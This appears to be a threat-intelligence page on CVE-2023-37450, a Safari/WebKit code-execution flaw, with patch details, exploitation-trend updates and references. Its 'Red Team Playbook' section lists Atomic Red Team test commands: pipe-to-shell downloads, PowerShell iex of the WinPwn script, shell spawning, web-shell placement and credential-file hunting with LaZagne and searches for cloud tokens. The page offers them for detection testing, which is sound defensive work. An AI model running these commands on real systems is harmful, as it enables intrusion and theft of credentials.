CVE-2023-37450
Overview
This vulnerability is a memory corruption flaw in the web content processing engine of Apple Safari and related Apple operating systems. It arises from insufficient validation and improper handling of web content inputs, leading to unsafe memory operations. The affected components include the Safari browser and WebKit-based rendering engines on iOS, iPadOS, macOS, tvOS, and watchOS platforms.
Vulnerability Description
The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, Safari 16.5.2, tvOS 16.6, macOS Ventura 13.5, watchOS 9.6. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Impact
An attacker can execute arbitrary code with the privileges of the user running Safari by convincing the user to visit a malicious web page. No prior authentication is needed, but user interaction to load the crafted content is required. Successful exploitation may result in full compromise of the affected device, including unauthorized access to sensitive data and control over system functions, potentially leading to data breaches or persistent device compromise.
Solution
Apple addressed this vulnerability by implementing improved validation checks in Safari 16.5.2 and operating system updates iOS 16.6, iPadOS 16.6, macOS Ventura 13.5, tvOS 16.6, and watchOS 9.6. Users and administrators should apply these updates promptly. Detailed patch information and update instructions are available in Apple's security advisories at https://support.apple.com/en-us/HT213826, https://support.apple.com/en-us/HT213846, and https://support.apple.com/en-us/HT213841.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from inadequate checks within the processing of web content in various Apple operating systems and applications, including Safari, iOS, iPadOS, macOS, tvOS, and watchOS. This flaw allows for arbitrary code execution, which means that an attacker could potentially execute malicious code on a victim's device without their consent. The root cause of this issue lies in the way the affected systems handle certain web content, which can be manipulated to bypass security mechanisms. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk that could lead to significant security breaches.
Attack vectors for this vulnerability primarily involve the exploitation of web browsers and applications that render web content. An attacker could craft a malicious website or manipulate existing content to trigger the flaw when a user visits the site. This could be done through phishing schemes, where users are lured into clicking on seemingly legitimate links. Additionally, attackers might leverage social engineering tactics to convince users to open documents or files that contain the malicious web content. Once the code is executed, the attacker could gain unauthorized access to sensitive information, install malware, or take control of the device, leading to further exploitation.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on Apple products for their operations. Organizations that utilize these devices may face data breaches, loss of intellectual property, and significant reputational damage if sensitive data is compromised. Furthermore, the potential for widespread exploitation means that the threat could extend beyond individual users to affect entire networks, leading to operational disruptions and financial losses. The awareness of active exploitation reports amplifies the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating affected systems and applications is crucial, as the patches provided by Apple in the latest versions are designed to address these security flaws. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activities that may indicate exploitation attempts. User education is also vital; training employees to recognize phishing attempts and suspicious links can significantly reduce the likelihood of successful attacks. Finally, employing web filtering solutions can help block access to known malicious sites, further protecting users from potential exploitation.
In conclusion, the vulnerability related to arbitrary code execution in various Apple operating systems poses a significant threat to both individual users and organizations. The potential for exploitation through crafted web content highlights the need for vigilance in cybersecurity practices. By prioritizing timely updates, user education, and robust detection mechanisms, organizations can mitigate the risks associated with this vulnerability and protect their assets from malicious actors. The evolving landscape of cyber threats necessitates a proactive approach to security, ensuring that both technology and personnel are equipped to handle emerging risks effectively.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-37450, rising by over 35% to a current level that remains low but trending upward. This shift indicates a growing likelihood of exploitation attempts targeting the vulnerability, despite the absence of newly reported exploit techniques or ransomware involvement. The inclusion of this CVE in the Known Exploited Vulnerabilities (KEV) catalog further underscores its relevance to threat actors and the need for continued monitoring. While the overall risk remains elevated due to the high severity and active exploitation reports, the incremental rise in EPSS suggests that adversaries may be increasingly focusing on this attack vector, warranting heightened vigilance from defenders to detect potential exploitation attempts in the near term.
Update 2 — July 07, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-37450, with telemetry indicating a doubling in exploitation attempts over a short period. This sharp increase, despite stable EPSS scoring, suggests adversaries are intensifying efforts to leverage this vulnerability in Apple Safari and related platforms. The uptick in detections, absent new exploit variants or ransomware linkage, highlights a growing operational focus rather than diversification of attack methods. For defenders, this trend signals an elevated likelihood of targeted exploitation attempts, underscoring the need for heightened monitoring of relevant traffic and system behaviors. Consequently, the threat level associated with this vulnerability has risen from elevated to a more urgent posture, reflecting increased adversary engagement and the potential for broader impact if mitigations are not consistently applied.
Update 3 — July 16, 2026
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2023-37450, reflecting increased adversary engagement with this Apple Safari vulnerability. Our telemetry indicates a steady upward trend in exploitation attempts, accompanied by a modest rise in the EPSS score, signaling growing confidence among threat actors in leveraging this flaw. While no new exploit variants or ransomware affiliations have been observed, the escalation in operational activity suggests a broader targeting effort rather than isolated incidents. This development elevates the risk environment, as the increased frequency of attempts enhances the probability of successful compromise, particularly on unpatched systems. Consequently, the threat level associated with this vulnerability has been adjusted to reflect a more urgent posture, emphasizing the critical need for vigilant monitoring and rapid response to emerging exploitation indicators.
Update 4 — August 01, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-37450, with telemetry indicating a significant uptick in operational activity. This surge reflects a broader adversary focus on this vulnerability, suggesting that threat actors are intensifying efforts to leverage the flaw despite existing patches. Although no new exploit variants or ransomware affiliations have been identified, the increased frequency of exploitation attempts raises the likelihood of successful intrusions, particularly in environments where timely patching has not been applied. The persistence of stable EPSS scores alongside rising detection activity underscores a sustained but not yet accelerating exploitation trend, highlighting the vulnerability’s continued attractiveness to attackers. Consequently, the threat level associated with CVE-2023-37450 has been elevated to reflect a heightened risk posture, emphasizing the criticality of ongoing monitoring and rapid detection to mitigate potential impacts.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Tvos | All |
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
|
|
|
Apple | Watchos | All |
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
|
|
|
Webkitgtk | Webkitgtk\+ | All |
cpe:2.3:a:webkitgtk:webkitgtk\+:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-37450 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213826 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213846 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213841 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213843 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213848 |
| security.gentoo.org |
GitHub CVE
|
https://security.gentoo.org/glsa/202401-04 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-37450 |